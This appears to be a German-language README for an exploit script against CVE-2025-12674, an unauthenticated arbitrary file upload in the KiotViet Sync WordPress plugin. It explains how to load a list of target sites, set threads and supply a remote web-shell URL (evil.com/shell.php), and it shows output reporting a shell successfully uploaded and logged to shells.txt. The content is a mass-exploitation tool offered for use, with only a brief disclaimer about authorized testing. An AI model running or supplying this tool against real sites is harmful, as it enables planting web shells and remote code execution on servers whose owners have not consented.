
KiotViet Sync <= 1.8.5 - Nicht authentifizierter beliebiger Datei-Upload
KiotViet Sync <= 1.8.5 - Nicht authentifizierter Upload beliebiger Dateien
Das KiotViet Sync-Plugin für WordPress (Versionen bis einschließlich 1.8.5) ist anfällig für das Hochladen beliebiger Dateien, da die Dateityp-Validierung in der Funktion create_media() fehlt.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf den Server hochzuladen, was zu Remote-Codeausführung führen kann.
Dieses Repository klonen oder das Skript herunterladen.
Ziele vorbereiten:
Ein Ziel pro Zeile in einer Datei namens list.txt platzieren.
example.com
site2.com
http://site3.com
Das Exploit-Skript ausführen:
Der Name des Skripts lautet:
CVE-2025-12674.py
python3 CVE-2025-12674.py
Bei Aufforderung die eigenen Optionen eingeben:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt gespeichert.Dieses Skript dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.
Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
Der Autor übernimmt keine Haftung für Missbrauch oder für verursachte Schäden.
Nxploited (Khaled Alenazi)